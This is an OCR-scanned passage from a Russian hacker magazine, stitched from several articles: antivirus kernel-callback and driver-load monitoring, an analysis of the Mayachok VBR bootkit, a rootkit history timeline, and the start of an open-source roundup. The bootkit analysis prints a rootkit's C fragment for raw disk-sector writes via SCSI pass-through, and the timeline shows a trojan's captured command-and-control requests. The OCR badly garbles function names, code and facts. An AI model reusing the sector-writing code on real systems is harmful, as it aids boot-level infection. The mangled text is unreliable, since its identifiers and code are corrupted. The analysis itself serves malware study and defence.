пользовании функций СтРедізІегСаІІВаскЕх, 
РедІ\ІоШуСЬапдеКеуѴаІие и РзВеіСгеаІеТЬгеасІ 
ІМоШуРоиЛпе). 

Для регистрации функции уве- 
домления о создании или заверше- 
ния процесса предусмотрена функция 
РзВеіСгеаІеРгосеззМоШуРоиІіпе (РзВеіСгеаІ 
еРгосеззЫоЛІ'уРоиЛпеЕх начиная с Ѵізіа 5Р1), 
и большинство создателей антивирусных 
средств не считают зазорным ею пользоваться 
(к примеру, на рисунке 9 проиллюстрирована 
регистрация саМ Ьаск-фу нкци и в драйвере 
сІѵѵргоЕзуз от «Доктора Веба»). Операцион- 
ная система вызывает зарегистрированный 
обработчик в двух случаях: когда процесс 



создается и когда процесс завершается. 

В первом из них функция уведомления вы- 
зывается, когда начальный поток уже создан, 
но его исполнение еще не началось. Во втором 
случае операционная система вызывает 
функцию уведомления перед завершением 
последнего потока в процессе. Что мы можем 
сделать, узнав, что какой-то процесс начал 
свою деятельность в операционной системе? 
Во-первых, мы можем просканировать всю 
память процесса, чтобы выяснить, нет ли в нем 
вредоносного кода (о том, как это сделать, 
мы уже знаем из прошлой статьи). Во-вторых, 
пробить этот процесс по списку доверенных 
и благонадежных. В-третьих, узнать, не пред- 
принималась ли попытка создать процесс 
с отрицательным РЮ, что однозначно говорит 
о намерении скрыть такой процесс. Ну 
и в-четвертых, можно получить список про- 
цессов с помощью СгеаІеТооІЬеІр325парзЬоІ 
(или МШиегуВузІетІпІюгтаІіоп на более 
низком уровне) и проверить, есть ли там 
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Рисунок 8. Настройка функции уведомления в «Антивирусе Касперского» на реагирование на создание потока 
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Рисунок 10. РБЗеІІ-оасІІтадеМоШуВоиІіпе в РгѴѴеЬ контролирует загрузку драйверов 



только что созданный процесс. Если его там 
нет, значит, ему есть что скрывать. При этом 
в большинстве случаев малварь скрывает за- 
пущенный процесс за счет перехвата функции 
ядра ІѵѵОиегуБуБІетЫогтаІіоп и фильтрации 
результатов работы этой функции. (Надеюсь, 
ты знаешь, чем АРІ-функции с префиксом 2ѵѵ 
отличаются от функций с префиксом N1? Если 
нет, срочно читай Руссиновича.) Таким обра- 
зом, обнаружив, что эта функция перехвачена 
кем-то неизвестным, срочно начинай бить 
тревогу. 

Вообще, практически все более-менее 
серьезные вредоносные программы любят 
перехватывать различные функции, но это мы 
обсудим чуть позже. 



ЗАГРУЗКА ДРАЙВЕРА 



Думаю, ты знаешь, что драйвер служит 
не только для управления всякими устрой- 



ствами, как было во времена старого доброго 
М5-Б05. Для многих программ драйвер — это 
путь к ядру системы, путь в гіпдО. Так же 
как любой солдат мечтает стать генералом, 
любая более или менее амбициозная малварь 
мечтает проникнуть в ядро системы и поста- 
вить ее на колени, а самый прямой и простой 
способ осуществить это — загрузка своего 
специально обученного вредоносного драй- 
вера. В свою очередь, любой более или менее 
амбициозный авер просто обязан следить 
за всеми драйверами в системе для борьбы 
с этим явлением. 

Первый способ, который напрашивается 
сам собой, — это контролировать загрузку 
драйверов путем перехвата АРІ-функции 
ІМНоасЮгіѵег. Он прост и, в общем-то, эффекти- 
вен, им не брезгуют пользоваться очень мно- 
гие производители антивирусных программ 
(к примеру, Сотосіо, Р-5есиге, «Лаборатория 



Касперского», которая включила этот меха- 
низм в свои антивирусы с шестой по девятую 
версию). Помимо этого, можно прибегнуть 
к уже знакомым нам функциям уведомле- 
ния. Функция Р55еИоабІтадеІ\ІоШуПоиЛпе 
регистрирует функцию уведомления, которая 
вызывается в момент загрузки образа или 
отображения образа в память. Операцион- 
ная система вызывает зарегистрированную 
саІІЬаск-функцию после отображения в память 
образа, исполняемого в пользовательском 
пространстве или в пространстве ядра (как 
раз то, что нам нужно, ведь драйвера как раз 
и грузятся в ядро), до начала исполнения об- 
раза (рисунок 10). 

Кроме того, некоторые антивирусы 
учитывают, что для загрузки драйвера его 
нужно прописать его в ветке реестра Н КБМ\ 
5у5Іет\СиггепіСопІгоІ5еі\5егѵісе5 (рисунок 
11). Достаточно следить за этой веткой, чтобы 
в случае появления там подозрительного раз- 
дела с параметром Туре, значение которого 
равно 1, 2 или 8 (это 5ЕПѴІСЕ_КЕПІМЕЕ_0РІѴЕП, 
5ЕРѴІСЕ_РИЕ_5У5ТЕМ_ПРІѴЕР или 5ЕРѴІСЕ_ 
РЕСОС N І2ЕР ПРІ ѴЕР соответственно), 
своевременно поднять тревогу (рисунок 11). 
Надо сказать, что не все антивирусы опо- 
вещают пользователя о загрузке драйвера. 
Некоторые аверы однозначно и бесповоротно 
считаютлюбой подозрительный загружаемый 
драйвер вредоносным и без спросу удаляют 
и сам драйвер, и программу, которая пыталась 
его загрузить, после чего бодро рапортуют, что 
малварь уничтожена. 



ЧТО ДАЛЬШЕ? 



Наш главный редактор уже многозначительно 
постукивает резиновой дубинкой по столу, 
намекая на то, что выделенное под статью 
место заканчивается. А ведь мне так хотелось 
рассказать про распознавание кейлоггеров, 
антируткит-технологии, «песочницу», подо- 
зрительную сетевую активность и целост- 
ность системных файлов, да и аналитический 
компонент проактивной защиты остался без 
внимания... Ну что же — жди продолжения, 
следующий номер не за горами. ПЕ 




Рисунок 11. Реакция «Антивируса Касперского» на загрузку драйвера от КегпеІ йеіесііѵе 1.2. 
Может, он и вправду вредоносный?.. 
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Александр Эккерт Ыаппіс.тапйдтаіІ.сот) 




НОВЫЙ ТИП 
РУТКИТОВ, 
ЗАРАЖАЮЩИХ 
ВООТ-СЕКТОРА 




Хорошие практики 
системного 
кодинга описаны в 
четвертом издании 
замечательной 
книги «ѴѴіпсІоѵѵз 
Бузіет Ргодгат- 
тіпд», которое 
вышло в 2010 году. 
Если постараться, ее 
можно найти в Сети. 



У производителей 
антивирусного обеспечения 
появилась новая головная 
боль — в руки вирусописателей 
попала очень необычная 
новая технология заражения 
операционной системы, 
использующая особенности 
загрузки томов жесткого диска. 
Ниже мы попробуем в ней 
разобраться. 



УШИ 

Для того чтобы 
приобрести очень 
хорошие навыки 
работы с ядром 
ѴѴіпііоѵѵб, советую 
посетить ѵѵѵѵѵѵ. 
озгопІіпе.сот.Это 
один из лучших 
сайтов в Сети о 
программировании в 
кегпеі тосіе в ядре, 
к тому же хорошо 
освещающий кодинг 
под 64-битные 
системы. 



П ы мог обратить внимание, что за последние один-два года 
сложность компьютерных вирусов существенно выросла. 
Создается впечатление, что на поприще вирусмейкер- 
ства и руткитостроения вчерашних школьников потеснили очень 
сильные кодеры, которые, дали бы фору даже самим разработ- 
чикам винды. Возникает вопрос, почему бы им, с их знаниями, не 
работать на хороших парней? Ответ очевиден. Ни одна антивирус- 
ная компания не будет платить такую зарплату, которая устроит 
разработчика продвинутого руткита, ведь помимо огромного бабла 
за разработку руткита он наверняка получает еще и процент от 
партнерок по подмене выдачи или от тех, кто принуждает поль- 
зователей отправлять платные 5М5-сообщения. Так что, в общем, 
можно не удивляться появлению таких сложных и интересных 
технологий, как заражение ѴВР. 



ЯВЛЕНИЕ ѴВК-РУТКИТА 



С легкой руки антивирусных товарищей из йг.ѴѴеЬ новоявлен- 
ный руткит был назван Тго)ап.МауасЬок. Кроме посредственного 
отчета, никакой информации о нем пока нет. Мы восполним этот 
пробел и как следует разберем эту интересную малварь. Основной 
особенностью руткита является необычный механизм заражения 
системы — можешь быть уверен, что ранее такого оригинального 
способа в дикой природе не встречалось. 

Каждый раздел диска (то есть каждая партиция, иногда на- 
зываемая «логический том 005»), имеет собственную загрузочную 
запись (Ѵоіите Вооі Ресогб, ѴВР) или по-другому — сектор, кому 
как нравится. Он отличается от Мазіег Вооі РесогсІ (МВР), которая 
контролирует процесс загрузки всего диска, однако суть их схожа. 
Таким образом, ѴВР отвечает за загрузку определенного логиче- 
ского тома. Каждый ѴВР состоит из блока параметров диска (йізк 
Рагатеіег ВІоск), который содержит специфическую информацию 
о томе, такую как размер, число секторов, имя тома и т.д., а также 
сам код загрузки тома (Ѵоіите Вооі Собе), который используется 
для старта операционной системы. Этот код вызывается кодом 
загрузки тома(та5Іег Ьооі) и исполняется каждый раз, когда за- 
гружается операционная система. Более подробно о различиях 
и особенностях МВР и ѴВР в различных операционных системах 
можно прочитать здесь — ШрѴЛбеБіагтап.пагоб.ги/азггі/ітіЬг/іпбех. 
Мт. ѴВР-руткит заражает код загрузки тома, подменяя список 
драйверов, грузящихся операционной системой и таким образом 
классическая проверка только загрузочного сектора не может 
обнаружить вредоносный объект, так как он располагается дальше 
— внутри ѴВР. ѴВР-руткит перехватывает прерывание ІІМТ 136 для 
просмотра содержимого секторов, считываемых с диска. Затем 
он загружает с диска свой драйвер и распаковывает на прежнее 
место оригинальный код ѴВР. Управление возвращается систем- 
ному загрузчику. После этого руткит патчит МІбг, Ьооітдг, озіоабег. 
ехе, ѵѵіпіоаб.ехе и т. д., в зависимости от используемого операцион- 
ной системой загрузчика, так как под удар попадает вся линейка 
ОС ѴѴіпбоѵѵз. Определенная новизна руткита также состоит в том, 
что он использует не только обычные перехваты, но и аппаратные 
отладочные регистры (бг0-бг7) и выполняет трассировку кода. Это 
необходимо для того, чтобы придать универсальность руткиту и 
обеспечить его обходом защиты целостности загрузочных модулей. 
Непосредственно установка драйвера и перезапись вызывается 
во время выполнения пНКіЗузІетЗіагІир, когда в системе еще не 
проинициализирована ЮТ и отключены прерывания и РаІсЬбиагб. 
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ѴВР-руткит 



Далее автор вредоносной программы прибег к изящному и не- 
стандартному решению: руткит патчит списки из структуры 
1_0А0ЕР_РАРАМЕТЕР_В1_0СК, в частности в список І_оасІ0гсІеги5І 
он добавляется как копия первого модуля в списке (а это ядро 
ОС), а в ВооЮгіѵегІ_І5І как загрузочный драйвер, якобы прописан- 
ный в ветке реестра \РедІ5Ігу\МасЫпе\5у5Іет\СиггепіСопІгоІ5еі\ 
5егѵісез\пиІІ. Сам механизм перезаписи сектора не использует 
никаких новых методов. Крис Касперски, например, неоднократно 
писал в нашем журнале о способах гаѵѵ-чтения и записи информа- 
ции на жесткий диск. Обычно для этого вызывается АРІ-функция 
пЫсІІ I ЮеѵісеІоСопІгоІ с кодом І0СТІ__5С5І_РА55_ТНР006Н_0ІРЕСТ. 
Предварительно заполняются блоки 5С5І_РА55_ТНР01І6Н_0ІРЕСТ 
и 5С5І_РА55_ТНР01І6Н_0ІРЕСТ_ѴѴІТН_ВІІРРЕР, после чего уже по- 
сылается 5РВ (5С5І Рециезі ВІоск]. Руткит делает это следующим 
образом: 

І-Р (Ріа^з & 5С5І ІО ЫКІТЕ 5ЕСТОЮ 

Ь_ 

Рігесііі оп = 5С5І ІОСТІ-РАТАОЦТ ; 

ОрСосІе = 5С5ІОР_ІлІКІТЕ; 

ОрСосІеІб = 5С5ІОР_ІлІКІТЕ16; 

ь_ 

Рігесіііоп = 5С5І_ІОСТІ__РАТА_ІІ\І; 

ОрСосІе = 5С5І0Р_КЕАР; 

ОрСосІеІб = 5С5І0Р_КЕАР16; 

і-р (5рі = (Р5С$І_РА$$_ТНК0Ц6Н_РІКЕСТ)та11ос(Ыеп) ) 

Ь_ 

5ріЬ = (Р5С5І_РА55_ТНКОІІСН_РІКЕСТ_1лІІТН_ВІІРРЕК)5рі: ; 
бРгіѵе = Сгеа1:еРі1е(Ргіѵе, ....); 

і±_ (ИРгіѵе ! = ІІ\ІѴ АІ.ІР_НАІ\ІРІ.Е_ Ѵ АІ.ЦЕ) 

{ 

5р1=->1епеі:1і = 5І2ео-Р(5С$І_РА$$_ТНК0Ц6Н_РІКЕСТ); 
5р1=->5еп5еІп-РоІеп^1=Іі = БРТІлІВ 5ЕІ\І5Е І.ЕІ\І6ТН; 

5рі:->Раі:аІп = Рігесііоп; 

5р1:->Ра1:аТгап5-РегІеп§1:Іі = _Ьеп§1:Іі; 

5рі->ТітеОи1:Ѵа1ие = 200; 

5рі->Ра1:аВи-р-Рег = Ви-р-Рег; 

Бр1:->5еп5еІп-РоО-р-р5е1: = (ЦІ.0ІМ6) 

( ( РСНАЮ&БріЬ- >5епзеІп-РоВи-р-Рег - (РСНАЮБріЬ ); 
і-Р а оВУ ТЕаоіл ІО КРРбеіѴегзіопП^ > 5) 
5рі->СсІЫ6.0рега1:іопСосІе = ОрСосІеІб; 

еізе 

5р1:->СсІЫб.Орега1=іопСосІе = ОрСосІе; 

5рі->СсІЫ6. РогсеІІпііАссезз = ТВЫЕ; 

// тут заполняются блоки 5р1:->СсІЫб 

5р1:->СсІЫ6.Соп1:го1 = 0x10; 

// посылаем 5КВ Ыоск диску 

Зіаіиз = РеѵісеІоСопігоЦІпРгіѵе., 

ІОСТЬ 5С5І РА55 ТНКОЦ6Н РІКЕСТ. 5р1=. Ыеп. 

5р*, Ыеп, &ЬКеа сІ , ИРЫ); 

} 

-Ргее(5р1:) ; 

} 



МУХИ И КОТЛЕТЫ 



В зараженную систему устанавливается полноценный драйвер, 
однако он всего лишь грузит дополнительную библиотеку или 
во все процессы подряд, или в некий заранее выделенный (тот 
экземпляр, который попал мне в руки, грузил сІІІ во все стартую- 
щие процессы). Это осуществляется с помощью обычного способа, 
который основан на регистрации собственного нотификатора 
РзСгеаІеРгосеззМоЫуРоиІіпе и последующем задействовании 
механизма АРС. Этот способ, используется и семейством руткита 
Т0І_/Ю55, в нем нет ничего нового, и останавливаться на нем 




Незараженная система 
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Система, зараженная ѴВР-руткитом 



незачем. Как именно портит жизнь троян, зависит уже от самой 
прогружаемой библиотеки. Так, антивирусные компании часто 
утверждают в тырнетах, что МауасЬок представляет серьезную 
опасность. Он крадет средства со счетов сотовых абонентов, 
предлагая пользователям ответить на входящее 5М5-сообщение. 
Зафиксированы случаи, когда троян подменял уоиІиЬе.сот, 
ѵкопіакіе.ги, осіпокіаззпікі.ги, гозіеіесот.ги, зиррогЕакасІо.ги, 
ту.таіі.ги и блокировал доступ в интернет. При попытке открыть 
в браузере какой-либо сайт Тго)ап.МауасЬок.1 перенаправлял 
пользователя на ЕІРІ_ страницы, предлагающей «активировать» 
или «подтвердить» аккаунт. Для этого пользователю нужно было 
указать свой номер телефона и ответить на 5М5-сообщение. Один 
из подтвержденных методов распространения этой програм- 
мы — рассылка в социальной сети В Контакте, рекламирующая 
программу для просмотра посетителей, заходивших на страницу 
пользователя. Это означает, что Тго)ап.МауасЬок прогружает в про- 
цессы браузеров свою библиотеку, которая подменяет стартовые 
страницы указанных сайтов, которые просят доверчивых пользо- 
вателей отправить 5М5-сообщение для получения доступа к сайту. 
Вся закавыка в том, что сам ѴВР-руткит служит лишь средством 
для доставки зловредного кода и сам по себе ничего деструктив- 
ного не несет (с точки зрения воздействия на ядро и установки 
драйвера в систему). 



И НА СТАРУХУ НАЙДЕТСЯ САМ ЗНАЕШЬ ЧЕГО... 



Самое удивительное в новомодном рутките — это отсутствие хоть 
какой-нибудь защиты от проактивок и антивирусных программ. И 
это крайне необычно, поскольку автор руткита, со своим опытом и 
очень оригинальным подходом к делу, мог бы запросто прикрутить 
для защиты нечто выдающееся. Например, взять ЮІ_ с его техни- 
кой перехвата обработчиков аіарі.зуз, которая используется для 
сокрытия файлов и до сих пор ставит в тупик разработчиков анти- 
вирусных решений. Реализуй автор ѴВР-руткита нечто подобное, 
троян бы превратился в очень мощное оружие, бороться с которым 
было бы очень непросто. Однако, как ни странно, ничего похожего 
в функционале ѴВР-руткита нет. Может быть, автор решил сделать 
защиту в более поздних «релизах» или в версиях для более узких 
кругов? К тому же выявить заражение системы очень легко (см. 
скрины). Да и вообще, зараженная ѴВР, присутствие «левого» 
драйвера и сІІІ в системе, регистрация собственного нотификатора 
загрузки процессов РзСгеаІеРгосеззМоШѴРоиІіпе и патч заргузчи- 
ка — все это палится в системе на ура. 



ЗАКЛЮЧЕНИЕ 



Выходит, не такой уж сильный программист писал этот руткит. Но 
зато в креативности ему не откажешь. Возможно, в будущем его 
замучают клиенты, и он разработает более серьезные и сложные 
версии ѴВР-руткита, которые будут выделяться не только уникаль- 
ным способом заражения системы. Интересно будет посмотреть, 
что у него получится, — разработчики ЮІ_/Т055 не стоят на месте, 
и, может быть, этот руткит тоже получит интересное техническое 
развитие. ПЕ 
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ИСТОРИЯ 

руткитов 

ОТ НАЧАЛА НАЧАЛ ДО СЕГОДНЯШНЕГО ДНЯ 



Термин «руткит» сам по себе не означает ничего плохого. Это всего лишь утилита 
или набор утилит для сокрытия какого-либо программного кода и следов его работы. 
Однако, так как скрываемый код обычно является вредоносным, в народе этот термин 
прочно закрепился за зловредами, прячущими себя в системе. Первоначально гооІкіСы 
появились в ІІМІХ-системах — они помогали замаскировать присутствие взломщика в 
системе. Но известность они приобрели с выходом операционных систем от МісгозоЙ.'А 
„ началось всё еще во времена М5-005 и стелс-вирусов... 




История руткитов 



т 



1986 

В 1^86 году братья Амджат и Базит Алви 
(Аплета* и Вазіі Рагоод АІѵі) из Пакистана 
разработали вирус Вгаіп. Зловред, в теле 
которого содержались имена, адреса и номера 
телефонов авторов, был разработан для того, 
чтобы наказать пиратов, ворующих софт у их 
компании. При попытке чтения заражённого 
сектора Вгаіп «подставлял» его незаражённый 
оригинал, то есть фактически являлся первым 
стелс-вирусом в истории. 

Вгаіп не только получил звание родона- 
чальника стелс-зловредов, но и стал первым 
зверьком, спровоцировавшим настоящую 
эпидемию, — только в США им было инфици- 
ровано около 18 тысяч компьютеров. 

1990 

В первые годы последнего десятилетия XX 
века проблема вирусов начала приобретать 
глобальный характер. В 1990 году на свет поя- 
вился первый полиморфный вирус Сбаатіеіеоп, 
который, помимо всего прочего, использо- 
вал для своей і^щиты стелс-приемчики. 
Сбатеіеоп успешно обходил антивирусные 
программы тех лет и долгое время был недо- 
сягаем для них. 

Во второй половине 1990-го «на волю» 
вырвались Ргосіо и ѴѴбаІе. Оба зловреда ис- 
пользовали продвинутые стелс-технологии, а 
ѴѴЬаІе был знаком с шифрованием и применял 
антиотладочные трюки. 

1992 ' 

Семейство вирусов ЕхеНеабег появи- 
лось в 1992 году. Зловред перехватывал 
136-прерывание и заражал файлы при чтении/ 
записи сектора, если в нем оказывался 
заголовок М2. Самым опасным из них стал 
ЕхеНеасІег.396, который работал на уровне 
216-прерывания и заражал ехе-файлы при их 
запуске. Вдобавок к этому он периодически 
пытался испортить жесткий диск. Другие виру- 
сы семейства ЕхеНеабег работали с прерыва- 
ниями 166, 1С6, 2Р6. 

^последующие годы появилось множество 



стелс-вирусов под М5-005. Они перехваты- 
вали разнообразные прерывания и 005- 
функции. РІапример, олигоморфик-стелс-вирус 
Кегріипк обрабатывал целых 23 функции: 
обращения к файлам, поиска, выделения и 
освобождения системной памяти. 

1993 

В 1993 году^в'ышла новая ОС от МісгозоК 
— ѴѴіпсІоѵѵз І\ІТ 3.1, которая задала новые 
стандарты безопасности. Под эту операцион- 
ную систему некоторое время не появлялось 
никаких серьезных зловредов, не говоря уже 
о стелс-вирусах. Продолжалось развитие вре- 
доносного ПО для М5-005, который тогда был 
еще широко распространен. 

1995 

В 1995 году гуру ѴѴіпсІоѵѵз-программирования 
Джефри Рихтер реі'Ітеу Рісбіег) в своей ле- 
гендарной книге Ргодгаттіпд Арріісаііопз Іюг 
МісгозоЙ ѴѴіпсІоѵѵз описал технологии перехва- 
та системных вызовов в гіпдЗ. Впоследствии 
во многих вредоносах использовался код из 
примеров, приведенных в этой книге. 

1997 

Первый ѵѵіп32-вирус, использующий стелс- 
приемы, появился лишь в 1997-м и получил 
название ѴѴіп32.СаЬапа5. Зловерд инфициро- 
вал РЕ-файлы, предварительно проверяя их 
размер. Если он был кратным 101 байту, про- 
грамма считалась зараженной. Чтобы скрыть 
следы своей активности, СаЬапаз перехва- 
тывал несколько АРІ-функций, в том числе 
РіпсІРігзіРіІеА, РіпсІРігзіРіІеѴѴ, РіпсИЧехіРіІеА 
и РіпсИЧехіРіІеѴѴГЕсли файл, к которому шло 
обращение, был заражен, вирус реализовывал 
свой полустелс-алгоритм и показывал, что 
этот файл имеет меньшую длину. 

В следующие году появилось множество 
зловредов, йспользующих стелс-технологии 
разной степени сложности. Например, ѴѴіп9х. 
2егд работал только под управлением ѴѴіпсІоѵѵз 
95/98 и перехватывал девять функций откры- 
тия/закрытия, чтения/записи и поиска файлов. 




Автор ВІиеРіІІ Жанна Рутковская. Красивая и умная 
одновременно 



При вызове некоторых из них вирус модифи- 
цировал системные данные таким образом, 
чтобы файл не выглядел инфицированным. 

1999 

В 1999 году ГрегХогланд (Вгед НодІипсІ) создал 
утилиту І\ІТ Рооікіі, в которой реализовал 
технику обхода системных механизмов защиты 
ѴѴіпсІоѵѵз. Результаты его работы были опу- 
бликованы в электронном журнале РНРАСК, а 
все стелс-вирусы, которые разрабатывались 
после этого, с легкой руки Хогланда стали на- 
зывать руткитами. 

В это же время вышла книга П. Дабак с со- 
авторами «Недокументированные возможно- 
сти ѴѴіпсІоѵѵз І\ІТ» (Р. ОаЬак еі аі "ІІпсІоситепІесІ 
ѴѴіпсІоѵѵз І\ІТ"), которая описывала методы 
перехвата системных вызовов в гіпдО. Более 
подробно эта тема освещается в книге Свена 
Шрайбера «Недокументированные возможно- 
сти ѴѴіпсІоѵѵз 2000», изданной в 2001 году. 
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85.17. 211. 165 


НТТР 


сет Ьапгіег . рИр?а"РТ_і сі=10б82 нттр/ 1 . 1 


192.168.88.148 


НТТР 


нттр/1.1 404 N 01 роипсі Х^ехі Іігші) 


69. 50.192. 52 


НТТР 


СЕТ /іпсіех. рИр?а1 : ‘Р_ісі=24080 НТТР/1.1 ШШ 


192.168.88.148 


НТТР 


НТТР/1.1 200 ОК • (гехг/НгпЛ) 



ВІаск Іпіегпеі Тгоіап запрашивает конфигурацию ѵѵѵѵѵѵ.ѵѵеаІНегІаІкі.сот 
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МАЮТАКЕ 



2000 

Русский программист создал проект Ье4Ьоок. 
Программа не содержала вредоносного кода, 
но умела скрывать файлы на жестком диске. 
Она работала на уровне ядра, но сам автор не 
считал свое детище руткитом. 

2002 



КОММЕРЧЕСКИЕ АНТИВИРУСЫ 
ПРИ ОБНАРУЖЕНИИ РУТКИТОВ 
БЫЛИ МЕНЕЕ ЭФФЕКТИВНЫ, ЧЕМ 
СПЕЦИАЛИЗИРОВАННЫЕ БЕСПЛАТНЫЕ 
УТИЛИТЫ 




В 2002 году появилась утилита Наскег 
йеіюпсіег (она же НасОеЦ. Программа, не 
являвшаяся зловредом, тем не менее предо- 
ставляла гораздо больше возможностей, чем 
Ье4Ьоок. НасОе* умела скрывать не только 
файлы, но и ключи реестра и процессы. . 
Утилита имела гибкие настройки и работала 
преимущественно в іізег-тосіе. 

2003 

Инструмент ѴапдиізЬ вышел в 2003 году. 

Он позволял скрывать файлы, директории 
и ключи реестра, но, в отличие от своих 
предшественников, выполнял некоторые 
вредоносные действия, а именно логировал 
пароли. Работал ѴапдиізЬ в гіпдЗ. 

В этом же году появился Нахсіоог. Это был 
уже полноценный бэкдор, использовавший 
руткит-технологии для своей маскировки. ПО 
работало в режиме ядра. Позже вышла его 
модификация А-31 1 ОеаіЬ. 

2004 

В 2004 году появилась утилита РіГ, і7^ед г 
назначенная для сокрытий процессов. Она 
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реализовывала принципиально новую техно- 
логию, основанную на изменении с^і^мных 
структур, а не путей к ним, как это делали 
предыдущие программы такого типа. 

В это время множество вредоносных 
программ начали использовать код или 
готовые утилиты таких руткитов, как НасОе* 
и РІІ. Вирусы либо напрямую обращались к 
исполняемым файлам маскирующего софта, 
что было самым распространенным решени- 
ем, либо модифицировали код опенсорных 
зловредов-руткитов, основанных на Нахсіоог. 

Нахсіоог, РІІ и НасОе* в том или ином виде 
встречались в 80 % руткитов того времени. 
Очень редко можно было встретить гоо*кі*'ы, 
написанные на заказ. Качество этих уни- 
кальных программ было на высоте. 

2005 

В 2005 году руткиты распространились на- 
столько широко, что привлекли внимание 
СМИ и крупных компаний. Так, например, на 
конференции Р5А 5есигі*у с^тостроитель- 
ная корпорация МісгозоІЧ подняла вопрос об 
угрозах со стороны руткитов. 

В это же время начали появляться не- 



4 4 

коммерческие антируткит-утилиты. Первые 
версии таких программ были узконаправ- 
ленными, например умели выявлять только 
скрытые файлы, но со временем маленькие 
утилиты превратились’^полноценное ПО для 
обнаружения гоо*кі*-вирусов. Такие програм- 
мы обладают мощным функционалом и гиб- 
кими настройками. К наиболее полезным из 
них можно отнести 6МЕР и Рооікіі ІІпЬоокег. 

Параллельно в недрах хакерского со- 
общества была разработана технология еЕуе 
ВооіРооІ, породившая концептуально новый 
класс руткитов — загрузочные руткиты или 
буткиты. Идея вовсе не нова, так как вирусы, 
записывающие себя в МВР, существовали 
еще во времена М5-005. Правда, в мире 
ѴѴіпсІоѵѵз такие шалости были гораздо слож- 
нее в реализации и опаснее. 

2006 

В 2006 году руткит-технологии начали ис- 
пользоваться в е-таіі-червях и троянцах, 
таких как Вадіе или Соісіип. Один из круп- 
нейших ботнетов того | времени — Ризіоск — 
активно использовал гоо*кі*-приемы. К концу 
своей жизни спамерская сеть насчитывала 
около двух миллионов компьютеров и могла 
отправлять до 25 тысяч сообщений в час. 

Между тем крупные антивирусные ком- 
пании в массовом порядке стали внедрять в 
свои продукты модули по борьбе со всемо- 
гущими зловредами. В целом коммерческие 
антивирусы при обнаружении руткитов были 
менее эффективны, чем специализирован- 
ные бесплатные утилиты, которыми, однако, 
могли использоваться только профессиона- 
лами. 

Но и вирмейкеры не стояли на месте. 
Появились концепции руткитов, основанные 
на аппаратной виртуализации. В 2006-м их 
было целых три: БиЬѴИ, Ѵіігіо и ВІиеРіІІ. 
Последняя была публично продемонстри- 
рована на конференции ВІаск На* ВгіеЛпдз 
третьего августа 2006 года в виде образца 
реализации для ядра ѴѴіпсІоѵѵз Ѵіз*а. Этот 
руткит разработала Йоанна Рутковская, 
польский специалист по компьютерной ' 
безопасности. Йоанна утверждала, что ее 
творение является «на 100 % не обнару- 
живаемым», поскольку гипервизор может 
обмануть любую программу детектирова- 
ния. Впоследствии она же создала про- 
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История руткитов 




Загрузочный код МеЬгаІіх 



грамму РесІРіІІ, позволявшую отслеживать 
использование виртуальной машины из 
непривилегированного режима и тем самым 
детектировать ВІиеРіІІ. 

2007" 

В 2007 году продолжились исследования 
в области буткитов. Был создан ѴЬооІкіІ, ко- 
торый представлял собой еще одну концепт- 
реализацию загрузочного руткита. Програм- 
ма позиционировалась в первую очередь как 
средство для исследования безопасности 
ѴѴіпсІоѵѵз Ѵіз(а, которая тогда как раз вышла. 

Примерно в то же время был реализован 
первый вредонос на основе этой технологии: 
ЗіпоѵѵаІ, или МеЬгооС Многие антивирусы 
долгое время ничего не могли противопо- 
ставить этому зловреду, и он безнаказанно 
буйствовал на пользовательских ПК. Не один 
десяток антивирусных аналитиков провел 
множество бессонных ноче й за изучением 
кода МеЬгооІ, который на тот момент был на- 
стоящим прорывом. 

Также в 2007 году был представлен кон- 
цепт биос-руткита ІсеЬогсІ, который мог ин- 
фицировать основу основ современного ПК. 
Конечно, для успешного заражения требова- 
лось соблюдение определенных условий, но 
начало было положено. 

2008 

РесІРіІІ, разработанная Жанной Рутков- 



ской, была вовсе не идеальна. Программа 
вызвала много критики в свой адрес, и ее 
разработка была прекращена. Но идеи, ле- 
жавшие в основе «Красной таблетки», про- 
должили'свою жизнь. В 2008 группа І\Іог(Ь 
Бесигііу І_аЬз сообщила о том, что среду 
виртуализации ВІиеРіІІ можно обнаружить. 
Специалисты рассказали, что отследить 
руткит можно как по косвенным признакам, 
например по снижению производительности 
или использованию внешнего источника 
времени, так иТ помощью доверенного ги- 
первизора, который бы запускал гипервизор 
вредоноса, и уже из-под него анализировал 
руткит-активность. Последний метод гораз- 
до надежнее. 

2 (МО 

В 2010-м, после относительного затишья 
на руткит-сцене, появилось еще несколько 
буткитов: АІірор, ВІаск Іп(егпе( Тго]ап и 6Ьоз( 
ЗЬасІоѵѵ (МеЬгаІіх. Ь). Первый из них имеет ки- 
тайские корни, о чем свидетельствует уста- 
навливаемая им АбѴѴаге на китайском языке. 
МеЬгаІіх впервые обнаружили специалисты 
компании 5утап(ес, а ВІаск Іп(егпе( Тго]ап в 
то время являлся самым распространенным 
буткитом. 

В августе появился первый гоо(кі( для 
64-битных ОС ѴѴіпсІоѵѵз. Вирус, препариро- 
ванный аналитиками компании «Доктор 
Веб», получил название ВаскОоог.ТсІзз. 

Но, пожалуй, королем руткитов 2010 года 
стал 5(ихпе(. Его популярность обусловлена 



в первую очередь тем, что, согласно одной 
теории, этот червь создали израильские 
спецслужбы специально для противодей- 
ствия ядерной программе Ирана. Вредонос 
перехватывает и модифицирует информа- 
ционный поток, которым обмениваются 
программируемые логические контроллеры 
марки 5ІМАТІС 57 и рабочие станции БСАйА- 
системы 5ІМАТІС ѴѴіпСС фирмы Біетепз. 
Руткит-функции в 5(ихпе( отошли на второй 
план. 

2011 

Второго сентября 2011-го китайская ком- 
пания ОіЬоо 360 сообщила о новом вирусе с 
ВІ05-руткитом МеЬготі. Зловред, нацелен- 
ный на китайских пользователей, не только 
заражает ВІ05, но и модифицирует МВР, 
работает как руткит в гіпдО, инфицирует РЕ- 
файлы и выполняет функции трояна. МеЬготі 
стал первым ВІ05-руткитом после концепта 
ІсеЬогсІ, появившегося в 2007 году. 



ЗАКЛЮЧЕНИЕ 



Уже сейчас очевидно, что руткиты всё 
глубже закапываются в железо. Современ- 
ные зловреды всё чаще инфицируют МВР, 
модифицируют В0І5 и используют виртуа- 
лизацию. Мне кажется, что антивирусные 
компании не в состоянии эффективно бо- 
роться с такими угрозами, поскольку ноёые 
технологии заражения пока очень слабо 
изучены. Поэтому самое интересное еще 
впереди... ИИ 
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ІЖІХОІО 
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ПОБЕДЫ И ПОРАЖЕНИЯ 
0РЕН501ЖСЕ— 2011 

Если попытаться вдвухсловахописать 
2011 годдлямираореп5оигсе,тоэто 
наверное будут«взломы» и «патенты». 

Так, мытрижды писали отом, какчерез 
БОЬ-инъекциюбыл взломан туБрІ.сот. 
